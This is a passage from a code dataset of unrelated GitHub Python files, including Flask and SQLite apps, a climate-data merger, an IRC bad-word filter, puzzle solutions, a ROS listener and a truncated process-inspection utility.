f'{user}'\n\n\n@app.route('/mean/')\ndef heiwei():\n pounds = 0.453592 # кг\n inches = 2.54 # см\n with open('templates/hw.csv') as csvfile:\n reader_object = csv.DictReader(csvfile, delimiter=\",\")\n height, weight = 0, 0\n for row in reader_object:\n height += float(row[\"Height(Inches)\"])\n weight += float(row[\"Weight(Pounds)\"])\n kol = int(row['Index'])\n\n return f'Средний рост: {(height/kol)*inches} см, Средний вес: {(weight/kol)/pounds} кг'\n\n\n@app.route('/space/')\ndef space():\n r = requests.get('http://api.open-notify.org/astros.json')\n a = r.json()[\"number\"]\n return f'

    Космонавтов на орбите: {a}

    '\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n","repo_name":"Nikolaevich10/h_w2","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"31977911788","text":"import sqlite3\nimport json\nfrom models import Employee\nfrom models import Location\n\n\nEMPLOYEES = [\n {\n \"id\": 1,\n \"name\": \"Justin Case\",\n \"role\": \"staff\",\n \"location_id\": 2\n },\n {\n \"id\": 2,\n \"name\": \"Irma Gawd\",\n \"role\": \"staff\",\n \"location_id\": 1\n },\n {\n \"id\": 3,\n \"name\": \"Paige Turner\",\n \"role\": \"staff\",\n \"location_id\": 1\n }\n]\n\ndef get_all_employees():\n \"\"\"This function gets all employees.\"\"\"\n # Open a connection to the database\n with sqlite3.connect(\"./kennel.sqlite3\") as conn:\n\n # Just use these. It's a Black Box.\n conn.row_factory = sqlite3.Row\n db_cursor = conn.cursor()\n\n # Write the SQL query to get the information you want\n db_cursor.execute(\"\"\"\n SELECT\n e.id,\n e.name,\n e.address,\n e.location_id,\n l.name location_name,\n l.address location_address\n FROM Employee e\n JOIN Location l\n ON l.id = e.location_id\n \"\"\")\n\n # Initialize an empty list to hold all employee representations\n employees = []\n\n # Convert rows of data into a Python list\n dataset = db_cursor.fetchall()\n\n # Iterate list of data returned from database\n for row in dataset:\n\n # Create an employee instance from the current row.\n # Note that the database fields are specified in\n # exact order of the parameters defined in the\n # Employee class above.\n employee = Employee(row['id'], row['name'], row['address'],\n row['location_id'])\n\n # Create a Location instance from the current row\n location = Location(row['id'], row['location_name'], row['location_address'])\n\n # Add the dictionary representation of the location to the animal\n employee.location = location.__dict__\n\n employees.append(employee.__dict__)\n\n # Use `json` package to properly serialize list as JSON\n return json.dumps(employees)\n\ndef get_single_employee(id):\n \"\"\"This function returns a single employee.\"\"\"\n with sqlite3.connect(\"./kennel.sqlite3\") as conn:\n conn.row_factory = sqlite3.Row\n db_cursor = conn.cursor()\n\n # Use a ? parameter to inject a variable's value\n # into the SQL statement.\n db_cursor.execute(\"\"\"\n SELECT\n a.id,\n a.name,\n a.address,\n a.location_id\n FROM employee a\n WHERE a.id = ?\n \"\"\", ( id, ))\n\n # Load the single result into memory\n data = db_cursor.fetchone()\n\n # Create an employee instance from the current row\n employee = Employee(data['id'], data['name'], data['address'], data['location_id'])\n\n return json.dumps(employee.__dict__)\n\ndef create_employee(employee):\n \"\"\"This function adds the new employee dictionary to the employee list\"\"\"\n max_id = EMPLOYEES[-1][\"id\"]\n\n new_id = max_id + 1\n\n employee[\"id\"] = new_id\n\n EMPLOYEES.append(employee)\n\n return employee\n\ndef delete_employee(id):\n \"\"\"This function deletes a single employee\"\"\"\n employee_index = -1\n\n for index, employee in enumerate (EMPLOYEES):\n if employee[\"id\"] == id:\n employee_index = index\n\n if employee_index >= 0:\n EMPLOYEES.pop(employee_index)\n\ndef update_employee(id, new_employee):\n \"\"\"This function deletes AND replaces employee with updated info\"\"\"\n for index, employee in enumerate(EMPLOYEES):\n if employee[\"id\"] == id:\n EMPLOYEES[index] = new_employee\n break\n \ndef get_employees_by_location(location_id):\n \"\"\"This function gets employees by their location id\"\"\"\n\n with sqlite3.connect(\"./kennel.sqlite3\") as conn:\n conn.row_factory = sqlite3.Row\n db_cursor = conn.cursor()\n\n # Write the SQL query to get the information you want\n db_cursor.execute(\"\"\"\n select\n a.id,\n a.name,\n a.address,\n a.location_id\n from Employee a\n WHERE a.location_id = ?\n \"\"\", ( location_id, ))\n\n employees = []\n dataset = db_cursor.fetchall()\n\n for row in dataset:\n employee = Employee(row['id'], row['name'], row['address'], row['location_id'])\n employees.append(employee.__dict__)\n\n return json.dumps(employees)\n","repo_name":"michellecaner/kennels-server","sub_path":"views/employees_requests.py","file_name":"employees_requests.py","file_ext":"py","file_size_in_byte":4453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"40509846653","text":"#!/bin/env python\n\"\"\"\nMerge the individual tiles together for a given ETCCDI index\n\nRun as::\n\n python merge_tiles.py --index TX90p\n\n--index ETCCDI index to process\n\"\"\"\n\n#*******************************************\n# START\n#*******************************************\nimport os\nimport glob\nimport calendar\nimport numpy as np\n\nimport iris\nfrom iris.experimental.equalise_cubes import equalise_attributes\nimport iris.coord_categorisation\nimport netCDF4 as ncdf\n\nimport utils\n\n#****************************************\ndef merge_cubes(index, timescale):\n '''\n Find all the files which should be part of the cube and merge into a single list\n '''\n\n files = []\n print(\"finding files\")\n if timescale == \"ann\":\n\n path = os.path.join(utils.DATALOC, \"indices\", \"{}ETCCDI_{}_climpact.era5_historical_*_{}-{}.nc\".format(index.lower(), \"yr\", utils.base_period_start, utils.base_period_end))\n print(path)\n files = glob.glob(path)\n elif timescale == \"mon\":\n path = os.path.join(utils.DATALOC, \"indices\", \"{}ETCCDI_{}_climpact.era5_historical_*_{}01-{}12.nc\".format(index.lower(), \"mon\", utils.base_period_start, utils.base_period_end))\n print(path)\n files = glob.glob(path)\n \n print(\"loading {} files\".format(len(files)))\n cubelist = iris.load(files)\n equalise_attributes(cubelist)\n\n # and merge the cubes\n merged_cubes = cubelist.concatenate()\n\n assert len(merged_cubes) == 1\n\n return merged_cubes[0] # merge_cubes\n\n#****************************************\ndef remove_coords(cube, monthly = True):\n '''\n Remove time bounds and added Auxillary coordinate of months\n '''\n\n cube.coord(\"time\").bounds = None\n\n if monthly:\n cube.remove_coord(\"month\") \n\n return cube # remove_coords\n\n#****************************************\ndef main(index):\n '''\n Combine cubes for annual and monthly into single output file.\n '''\n\n if not os.path.exists(os.path.join(utils.DATALOC, \"final\")):\n os.mkdir(os.path.join(utils.DATALOC, \"final\"))\n\n\n # get annual cube\n annual_cube = merge_cubes(index, \"ann\")\n annual_cube.var_name = \"Ann\"\n annual_cube = remove_coords(annual_cube, monthly = False)\n annual_cube.data.fill_value = utils.MDI\n annual_cube.missing_value = utils.MDI\n annual_cube._FillValue = utils.MDI\n \n final_cubelist = [annual_cube]\n\n if index in [\"TN10p\", \"TN90p\", \"TX10p\", \"TX90p\", \"TNn\", \"TNx\", \"TXn\", \"TXx\", \"DTR\", \"Rx1day\", \"Rx5day\"]:\n # get monthly cube\n monthly_cube = merge_cubes(index, \"mon\")\n\n # now process cube into months\n iris.coord_categorisation.add_month(monthly_cube, 'time', name='month')\n\n # extract each month\n for m in calendar.month_abbr:\n if m == \"\":\n continue\n else:\n print(m)\n monthConstraint = iris.Constraint(month=m)\n\n month_cube = monthly_cube.extract(monthConstraint)\n month_cube.var_name = m\n month_cube = remove_coords(month_cube) \n \n month_cube.data.fill_value = utils.MDI\n month_cube.missing_value = utils.MDI\n month_cube._FillValue = utils.MDI\n\n final_cubelist += [month_cube]\n\n # and save the list\n iris.save(final_cubelist, os.path.join(utils.DATALOC, \"final\", \"ERA5_{}_1979-{}.nc\".format(index, utils.ENDYEAR)), fill_value=utils.MDI, zlib=True)\n\n return # main\n\n\n#****************************************\nif __name__ == \"__main__\":\n\n import argparse\n\n # set up keyword arguments\n parser = argparse.ArgumentParser()\n parser.add_argument('--index', dest='index', action='store', default=\"TX90p\", \n help='etccdi index')\n\n args = parser.parse_args()\n\n if args.index in [\"ETR\", \"R99pTOT\", \"R95pTOT\"]:\n print(\"merging not required for {}\".format(args.index))\n else:\n main(args.index)\n \n#*******************************************\n# END\n#*******************************************\n","repo_name":"rjhd2/era5_etccdi","sub_path":"merge_tiles.py","file_name":"merge_tiles.py","file_ext":"py","file_size_in_byte":4074,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"21833292396","text":"import re\nimport math\nimport time\n\nimport supybot.conf as conf\nimport supybot.utils as utils\nimport supybot.ircdb as ircdb\nimport supybot.ircmsgs as ircmsgs\nfrom supybot.commands import *\nimport supybot.ircutils as ircutils\nimport supybot.callbacks as callbacks\n\nclass BadWords(callbacks.Privmsg):\n \"\"\"Maintains a list of words that the bot is not allowed to say.\n Can also be used to kick people that say these words, if the bot\n has op.\"\"\"\n def __init__(self, irc):\n self.__parent = super(BadWords, self)\n self.__parent.__init__(irc)\n # This is so we can not filter certain outgoing messages (like list,\n # which would be kinda useless if it were filtered).\n self.filtering = True\n self.lastModified = 0\n self.words = conf.supybot.plugins.BadWords.words\n\n def callCommand(self, name, irc, msg, *args, **kwargs):\n if ircdb.checkCapability(msg.prefix, 'admin'):\n self.__parent.callCommand(name, irc, msg, *args, **kwargs)\n else:\n irc.errorNoCapability('admin')\n\n def sub(self, m):\n replaceMethod = self.registryValue('replaceMethod')\n if replaceMethod == 'simple':\n return self.registryValue('simpleReplacement')\n elif replaceMethod == 'nastyCharacters':\n return self.registryValue('nastyChars')[:len(m.group(1))]\n\n def inFilter(self, irc, msg):\n self.filtering = True\n # We need to check for bad words here rather than in doPrivmsg because\n # messages don't get to doPrivmsg if the user is ignored.\n if msg.command == 'PRIVMSG':\n self.updateRegexp()\n s = ircutils.stripFormatting(msg.args[1])\n channel = msg.args[0]\n if ircutils.isChannel(channel) and self.registryValue('kick', channel):\n if self.regexp.search(s):\n if irc.nick in irc.state.channels[channel].ops:\n message = self.registryValue('kick.message', channel)\n irc.queueMsg(ircmsgs.kick(channel, msg.nick, message))\n else:\n self.log.warning('Should kick %s from %s, but not opped.',\n msg.nick, channel)\n return msg\n\n def updateRegexp(self):\n if self.lastModified < self.words.lastModified:\n self.makeRegexp(self.words())\n self.lastModified = time.time()\n\n def outFilter(self, irc, msg):\n if self.filtering and msg.command == 'PRIVMSG' and self.words():\n self.updateRegexp()\n s = msg.args[1]\n if self.registryValue('stripFormatting'):\n s = ircutils.stripFormatting(s)\n t = self.regexp.sub(self.sub, s)\n if t != s:\n msg = ircmsgs.privmsg(msg.args[0], t, msg=msg)\n return msg\n\n def makeRegexp(self, iterable):\n s = '(%s)' % '|'.join(map(re.escape, iterable))\n if self.registryValue('requireWordBoundaries'):\n s = r'\\b%s\\b' % s\n self.regexp = re.compile(s, re.I)\n\n def list(self, irc, msg, args):\n \"\"\"takes no arguments\n\n Returns the list of words being censored.\n \"\"\"\n L = list(self.words())\n if L:\n self.filtering = False\n utils.sortBy(str.lower, L)\n irc.reply(format('%L', L))\n else:\n irc.reply('I\\'m not currently censoring any bad words.')\n list = wrap(list, ['admin'])\n\n def add(self, irc, msg, args, words):\n \"\"\" [ ...]\n\n Adds all s to the list of words being censored.\n \"\"\"\n set = self.words()\n set.update(words)\n self.words.setValue(set)\n irc.replySuccess()\n add = wrap(add, ['admin', many('something')])\n\n def remove(self, irc, msg, args, words):\n \"\"\" [ ...]\n\n Removes s from the list of words being censored.\n \"\"\"\n set = self.words()\n for word in words:\n set.discard(word)\n self.words.setValue(set)\n irc.replySuccess()\n remove = wrap(remove, ['admin', many('something')])\n\n\nClass = BadWords\n\n\n# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:\n","repo_name":"Supybot/Supybot","sub_path":"plugins/BadWords/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":4230,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"60"} +{"seq_id":"40987620312","text":"from collections import defaultdict\nclass Solution:\n def isIsomorphic(self, s: str, t: str) -> bool:\n \n\n default_1 = defaultdict(str)\n default_2 = defaultdict(str)\n\n\n for i in range(len(s)):\n # create s -> t\n if not default_1[s[i]]:\n default_1[s[i]] = t[i]\n\n # create t -> s\n if not default_2[t[i]]:\n default_2[t[i]] = s[i]\n\n # check if the reference is correct\n if default_1[s[i]] != t[i] or default_2[t[i]] != s[i]:\n return False \n\n return True \n\n# Time Complexity: O(n)\n# Space Complexity: O(26)","repo_name":"Logenleedev/--Data-Structure-and-Algorithm","sub_path":"Extra/hashmap/Leetcode_Solution/Leetcode_205_isomorphic_string.py","file_name":"Leetcode_205_isomorphic_string.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74878298111","text":"from object_detection import Object_detection\nfrom algorithm import Algorithm\nimport time\na = Object_detection()\nb = Algorithm()\nwhile True:\n a.read_frame()\n a.get_indices()\n object_dict = a.extract_info_from_indices()\n \n # Algorithm\n b.feed_in(object_dict)\n \n # Call extract_and_update with the following parameters\n # (object_1_id, object_2_id,iou_threshold,trigger_alarm_threshold,\n # frame_buffer_threshold)\n \n # Max of trigger_alarm_threshold is frame_buffer_threshold\n # If trigger_alarm_threshold/frame_buffer_threshold is a alarm\n # alarm is triggered\n \n b.extract_and_update(0,2,0.1,44,50)\n \n # Print the real_alarm state for main object 0 with sub object 2\n #print(b.real_alarm[\"0_2\"])\n \n a.show()\n\nprint(time.time()-now)\nprint(count)\n","repo_name":"justinkwan1216/Grad-cam","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"41157319053","text":"# gpt chatbot\nfrom config import my_key\nimport openai\n\n# setting the api key\nopenai.api_key = my_key\n\ndef chat_gpt_bot(prompt):\n response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[{'role':'user', 'content': prompt}]\n )\n\n # filter the response content\n return response.choices[0].message.content.strip()\n\n\n\nif __name__ == \"__main__\":\n while True:\n user_input = input(\"You: \")\n\n if user_input.lower() in ['quit', 'exit', 'break', 'bye', 'stop']:\n break\n\n response = chat_gpt_bot(user_input) # calling chat_gpt_bot function\n print('ChatBot: ', response)\n\nprint('Script stoped')","repo_name":"abhi7745/gpt_chatbot","sub_path":"gpt_chatbot.py","file_name":"gpt_chatbot.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"73107521471","text":"import math\n\n\n# class for node\nclass Node(object):\n\n # constructor\n def __init__(self, new_layout, old_node_layout=None, wayCost=0, level=0):\n self.layout = new_layout\n self.level = level\n # cost to move 1 tile compared to previous layout\n self.wayCost = wayCost if wayCost else level\n self.prev_node_layout = old_node_layout if old_node_layout else None\n\n # function to print layout\n def __repr__(self):\n r_val = \"\"\n layout = [chr(n + 48) for n in make_list_layout(self.layout)]\n if \"0\" in layout:\n layout[layout.index(\"0\")] = \" \"\n else:\n layout = [\" \"] + layout\n for i in [0, 3, 6]:\n r_val += \"\\n\" + (\"\".join(layout[i] + layout[i + 1] + layout[i + 2]))\n return r_val\n\n # redefined equality function\n def __eq__(self, comp_node):\n return True if self.layout == comp_node.layout else False\n\n\n# list class expansion to represent nodes\nclass NodeList(list):\n\n # magic function to use in \"in\" clause\n def __contains__(self, key):\n layouts = (o.layout for o in self)\n return key.layout in layouts\n\n\n# fast way to convert int to list\ndef make_list_layout(number):\n return [number // 10 ** n % 10 for n in range(getCountOfDigits(number) - 1, -1, -1)]\n\n\n# function to enter layout with checking it for uniqueness and fullness\ndef input_layout(message):\n while True:\n layout = input(message)\n if (len(layout) != 8) and (len(layout) != 9):\n print(\"Invalid number of elements! Please enter again\")\n else:\n # checking uniqueness\n checked = \"\"\n legal = True\n for ch in layout:\n if ch not in checked:\n checked += ch\n else:\n print(\"Numbers should not repeat! Try again\")\n legal = False\n break\n # if everything is ok, check if we have only 8 elements - then the last is empty and we need\n # to fill it with space\n if legal:\n if len(layout) == 8:\n layout += \"0\"\n else:\n layout = list(layout)\n layout[layout.index(\" \")] = \"0\"\n break\n return int(\"\".join(layout))\n\n\n# universal func to print our lists of nodes without braces\ndef print_nodes(lst):\n lines = [\"\", \"\", \"\", \"\"]\n res = \"\"\n if lst:\n nodeCounter = 0\n for n in lst:\n layout = [chr(n + 48) for n in make_list_layout(n.layout)]\n if \"0\" in layout:\n layout[layout.index(\"0\")] = \" \"\n else:\n layout = [\" \"] + layout\n digits = getCountOfDigits(n.wayCost)\n lines[0] += \"\".join(layout[:3]) + \" \" * (digits + 1)\n lines[1] += \"\".join(layout[3:6]) + \" \" * (digits + 1)\n lines[2] += \"\".join(layout[6:]) + \" \" * (digits + 1)\n lines[3] += \"w:{}\".format(n.wayCost) + \" \" * 2\n nodeCounter += 1\n if nodeCounter == 30:\n res += \"\\n\".join(lines) + \"\\n\\n\"\n lines = [\"\", \"\", \"\", \"\"]\n nodeCounter = 0\n res += \"\\n\".join(lines)\n print(res)\n else:\n print(\"Empty list\")\n\n\n# function to print list of nodes without wayCost\ndef print_list(lst):\n lines = [\"\", \"\", \"\"]\n res = \"\"\n if lst:\n nodeCounter = 0\n for n in lst:\n layout = [chr(ch + 48) for ch in make_list_layout(n)]\n if \"0\" in layout:\n layout[layout.index(\"0\")] = \" \"\n else:\n layout = [\" \"] + layout\n lines[0] += \"\".join(layout[:3]) + \" \"\n lines[1] += \"\".join(layout[3:6]) + \" \"\n lines[2] += \"\".join(layout[6:]) + \" \"\n nodeCounter += 1\n if nodeCounter == 30:\n res += \"\\n\".join(lines) + \"\\n\\n\"\n lines = [\"\", \"\", \"\"]\n nodeCounter = 0\n res += \"\\n\".join(lines)\n print(res)\n else:\n print(\"Empty list\")\n\n\n# fast way to count amount of digits in a number\ndef getCountOfDigits(number):\n return 1 if number == 1 or number == 0 else round(math.log10(number) + 0.5)\n","repo_name":"AlexIvanov11/AI_lab1","sub_path":"node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":4251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"8591659792","text":"#!/usr/bin/env python\nimport rospy\nfrom std_msgs.msg import String\nfrom gpiozero import LED\n\nred = LED(2)\nyellow = LED(3)\ngreen = LED(4)\n\ndef callback(data):\n #rospy.loginfo(\"in call back\")\n #rospy.loginfo(\"data is: %s\", data.data)\n if data.data == \"red\":\n rospy.loginfo(\"yes: RED\")\n red.on()\n elif data.data == \"no-red\":\n rospy.loginfo(\"no: RED\")\n red.off()\n elif data.data == \"yellow\":\n rospy.loginfo(\"yes: YELLOW\")\n yellow.on()\n elif data.data == \"no-yellow\":\n rospy.loginfo(\"no: YELLOW\")\n yellow.off()\n elif data.data == \"green\":\n rospy.loginfo(\"yes: GREEN\")\n green.on()\n elif data.data == \"no-green\":\n rospy.loginfo(\"no: GREEN\")\n green.off()\n else:\n rospy.loginfo(\"nothing: NOT MATCH\")\n\ndef listener():\n rospy.init_node('listener', anonymous=True)\n rospy.Subscriber(\"chatter\", String, callback)\n rospy.loginfo(\"start listen through /chatter\")\n rospy.spin()\n\nif __name__ == '__main__':\n listener()\n","repo_name":"nquantum/gpio_catkin_ws","sub_path":"listener.py","file_name":"listener.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"71638087232","text":"import argparse\nimport string\n\n\ndef part_1(input_string):\n dance_moves = input_string.split(',')\n programs = list(string.ascii_lowercase[:16])\n for dance_move in dance_moves:\n if dance_move.startswith('s'):\n spin_size = int(dance_move[1:])\n programs = programs[-spin_size:] + programs[:-spin_size]\n continue\n\n if dance_move.startswith('x'):\n pos_A, pos_B = list(map(int, dance_move[1:].split('/')))\n programs[pos_A], programs[pos_B] = programs[pos_B], programs[pos_A]\n continue\n\n if dance_move.startswith('p'):\n program_A, program_B = dance_move[1:].split('/')\n pos_A = programs.index(program_A)\n pos_B = programs.index(program_B)\n programs[pos_A], programs[pos_B] = programs[pos_B], programs[pos_A]\n continue\n print(''.join(programs))\n\n\ndef part_2(input_string):\n dance_moves = input_string.split(',')\n programs = list(string.ascii_lowercase[:16])\n dance_time = 1000000000\n programs_history = []\n for i in range(dance_time): \n programs_state = ''.join(programs)\n if programs_state in programs_history:\n history_index = programs_history.index(programs_state)\n print(programs_history[history_index + dance_time % (i - history_index)])\n break\n\n for dance_move in dance_moves:\n if dance_move.startswith('s'):\n spin_size = int(dance_move[1:])\n programs = programs[-spin_size:] + programs[:-spin_size]\n continue\n\n if dance_move.startswith('x'):\n pos_A, pos_B = list(map(int, dance_move[1:].split('/')))\n programs[pos_A], programs[pos_B] = programs[pos_B], programs[pos_A]\n continue\n\n if dance_move.startswith('p'):\n program_A, program_B = dance_move[1:].split('/')\n pos_A = programs.index(program_A)\n pos_B = programs.index(program_B)\n programs[pos_A], programs[pos_B] = programs[pos_B], programs[pos_A]\n continue\n programs_history.append(programs_state)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--part\",\n help=\"Specify puzzle 1 or puzzle 2 to be solved. Run both by default.\",\n required=False)\n args = parser.parse_args()\n file_input = open('Input_16.txt', 'r')\n input_string = file_input.read()\n file_input.close()\n\n if args.part == '1':\n part_1(input_string)\n elif args.part == '2':\n part_2(input_string)\n else:\n part_1(input_string)\n part_2(input_string)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"DSW41923/AoC_DSW41923","sub_path":"2017/Day_16.py","file_name":"Day_16.py","file_ext":"py","file_size_in_byte":2761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"39032073638","text":"# 실버3\n# 스택 수열\nimport sys\nN = int(sys.stdin.readline())\nT = [int(sys.stdin.readline()) for _ in range(N)]\n\nfail_check = False\ntemp_data = []\nresult = []\nindex = 0\nin_num = 1\nwhile N > index:\n\n if len(temp_data) > 0 and T[index] == temp_data[-1]:\n temp_data.pop()\n result.append(\"-\")\n index += 1\n else:\n if in_num > N:\n fail_check = True\n break\n temp_data.append(in_num)\n result.append(\"+\")\n in_num += 1\n\nif fail_check: print(\"NO\")\nelse: \n for i in result: print(i)\n\n\"\"\"\n\n8\n4\n3\n6\n8\n7\n5\n2\n1\n\n5\n1\n2\n5\n3\n4\n\n5\n3\n2\n1\n4\n5\n\"\"\"","repo_name":"woghks778803/algorithm-study","sub_path":"backjoon/Sliver/1874.py","file_name":"1874.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"29193670328","text":"import sys\nimport pickle\nimport random\nfrom sets import Set\nimport sys\nimport numpy as np\n\n\nnotes = pickle.load(open(sys.argv[1], 'r'))\nk = int(sys.argv[2])\n\ndictionary = {}\n\n#get parameters from normal distribution (tick values)\nmy_array = []\nfor element in notes:\n my_array.append(element[0])\n\n#tick_standardDev = np.std(my_array)\n#tick_mean = np.mean(my_array) \n#print tick_mean\n\n#print np.random.normal(tick_mean, tick_standardDev, 1)\n\nfor i in range(0, len(notes)):\n this_value = notes[i][2]\n my_set = Set()\n if i < (len(notes) - 1): \n my_set.add(notes[i+1])\n for j in range((i + 1), len(notes) -1):\n if (notes[j][2] == this_value) and (this_value not in dictionary.keys()):\n my_set.add(notes[j+1])\n dictionary[this_value] = my_set\n\nfor element in dictionary:\n dictionary[element] = list(dictionary[element])\n\nstart = random.choice(list(dictionary.keys()))\noutput_list = []\n\nfor i in range(0, k): \n my_tuple = [random.choice(my_array)]\n my_note = random.choice(list(dictionary[start]))\n my_tuple.extend(my_note[1:])\n output_list.append(my_tuple)\n start = my_note[2]\n if random.randint(0, 100) < 5:\n start = random.choice(list(dictionary.keys()))\n \npickle.dump(output_list, open('MarkovDisBitch.p', 'wb'))\n","repo_name":"haldean/midigen","sub_path":"markov.py","file_name":"markov.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"9179295677","text":"'''\r\nRAISING YOUR OWN EXCEPTIONS\r\n'''\r\n\r\n\r\ndef raise_exception(alist, value):\r\n errors = []\r\n \r\n for i in alist:\r\n if i <= value:\r\n errors.append(ValueError(\"{} is not greater than {}\".format(i, value)))\r\n \r\n return errors\r\n\r\n\r\nprint(raise_exception([3], 2))\r\n","repo_name":"ivSaav/Programming-Fundamentals","sub_path":"RE13/raise_exception.py","file_name":"raise_exception.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"71441905152","text":"import os\nimport platform\n\nfrom core import system as os_type\n\ntry:\n from commands import getstatusoutput\nexcept:\n from subprocess import getstatusoutput\n\n\n\ndef get_list():\n '''get process list'''\n res = []\n if os_type == 'Linux':\n for pid in os.listdir('/proc'):\n if pid.isdigit():\n res.append(get_base(pid))\n elif os_type == 'Darwin':\n pass\n elif os_type == 'Windows':\n pass\n return res\n\n\ndef get_name(pid):\n if not pid:\n return False\n name = None\n if os_type == 'Linux':\n comm = '/proc/%s/comm' % pid\n if os.path.exists(comm):\n with open(comm, 'r') as f:\n line = f.readline()\n name = line.strip()\n if not name:\n status = '/proc/%s/status' % pid\n if os.path.exists(status):\n with open(status, 'r') as f:\n line = f.readline()\n name = line.split()[1]\n elif os_type == 'Darwin':\n pass\n elif os_type == 'Windows':\n pass\n return name\n\n\ndef kill_process(name):\n '''kill process by name'''\n if not name:\n return\n pids = get_pids(name)\n # print('pid', pids)\n if pids:\n return kill_pids(pids)\n else:\n return False\n\n\ndef kill_pids(pids):\n '''kill process by pids'''\n if not pids:\n return\n if isinstance(pids, list):\n pids = ' '.join(pids) # to string\n if os_type in ('Linux', 'Darwin'):\n s_cmd = u'/bin/kill -9 %s' % pids\n status, result = getstatusoutput(s_cmd)\n return status == 0\n else:\n return False\n\n\ndef get_pids(name):\n '''get pids of a process'''\n if not name:\n return\n res = []\n if os_type in ('Linux', 'Darwin'):\n s_cmd = u\"/bin/ps auxww | grep %s | grep -v grep | awk '{print $2}'\" % name\n status, result = getstatusoutput(s_cmd)\n if status == 0 and result:\n res = ' '.join(result.split()).split(' ') # list\n return res\n\n\ndef get_cmdline(pid):\n '''parse cmdline'''\n if not pid:\n return\n if os_type == 'Linux':\n if os.path.exists('/proc/%s/cmdline' % pid):\n with open('/proc/%s/cmdline' % pid, 'r') as f:\n line = f.readline()\n return line.strip()\n else:\n return ''\n\n\ndef get_base(pid):\n '''get base info'''\n if not pid:\n return\n res = {\n 'name': '',\n 'state': '',\n 'pid': '',\n 'ppid': '',\n 'fdsize': '',\n 'vmpeak': '',\n 'vmsize': ''\n }\n if os_type == 'Linux':\n if os.path.exists('/proc/%s/status' % pid):\n f = open('/proc/%s/status' % pid, 'r')\n line = f.readline()\n while line:\n out = line.strip()\n if out.startswith('Name'):\n res['name'] = out.split()[1]\n if out.startswith('State'):\n res['state'] = out.split()[1]\n if out.startswith('Pid'):\n res['pid'] = out.split()[1]\n if out.startswith('PPid'):\n res['ppid'] = out.split()[1]\n if out.startswith('FDSize'):\n res['fdsize'] = out.split()[1]\n if out.startswith('VmPeak'):\n res['vmpeak'] = out.split()[1]\n if out.startswith('VmSize'):\n res['vmsize'] = out.split()[1]\n # print(line),\n line = f.readline()\n if res['name'] and res['state'] and res['pid'] and res['ppid'] and res['fdsize'] and res['vmpeak'] and res['vmsize']:\n break\n f.close()\n return res\n\n\ndef get_file(pid):\n '''get process file'''\n if not pid:\n return\n return {'name': 'test', 'pid': pid}\n\n\ndef get_environ(pid):\n '''parse environ'''\n if not pid:\n return\n res = ''\n if os_type == 'Linux':\n if os.path.exists('/proc/%s/environ' % pid):\n with open('/proc/%s/environ' % pid, 'r') as f:\n line = f.readline()\n res = line.strip()\n return res\n\n\ndef get_status(pid):\n '''parse status'''\n if not pid:\n return\n res = {}\n if os_type == 'Linux':\n sts = '/proc/%s/status' % pid\n # sts = '/Users/douzhenjiang/test/inpanel/test/proc_status.txt'\n # if os_type in ('Linux', 'Darwin'):\n if os.path.exists(sts):\n f = open(sts, 'r')\n line = f.readline()\n while line:\n out = line.strip()\n # print('aaaaaaasplit', out.split())\n tmp = out.split()\n if out.startswith('Uid') or out.startswith('Gid') or out.startswith('Vm'):\n res[tmp[0].split(':')[0].lower()] = tmp[1:]\n elif out.startswith('State'):\n res[tmp[0].split(':')[0].lower()] = [tmp[1], tmp[2][1:-1].lower()]\n else:\n res[tmp[0].split(':')[0].lower()] = tmp[1] if len(tmp) > 1 else ''\n line = f.readline()\n f.close()\n return res\n\n\ndef get_io(pid):\n '''parse io'''\n if not pid:\n return\n res = {}\n if os_type == 'Linux':\n sts = '/proc/%s/io' % pid\n # sts = '/Users/douzhenjiang/test/inpanel/test/proc_io.txt'\n # if os_type in ('Linux', 'Darwin'):\n if os.path.exists(sts):\n f = open(sts, 'r')\n line = f.readline()\n while line:\n out = line.strip()\n res[out.split()[0].split(':')[0].lower()] = out.split()[1]\n line = f.readline()\n f.close()\n return res\n\n\ndef get_memory(pid):\n '''get memory, parse statm'''\n if not pid:\n return\n res = ''\n if os_type == 'Linux':\n if os.path.exists('/proc/%s/statm' % pid):\n with open('/proc/%s/statm' % pid, 'r') as f:\n line = f.readline()\n line = line.strip()\n res = line.split()\n return res\n\n\ndef get_info(pid):\n '''parse stat'''\n if not pid:\n return\n res = {}\n if os_type == 'Linux':\n sts = '/proc/%s/stat' % pid\n # sts = '/Users/douzhenjiang/test/inpanel/test/proc_stat.txt'\n # if os_type in ('Linux', 'Darwin'):\n if 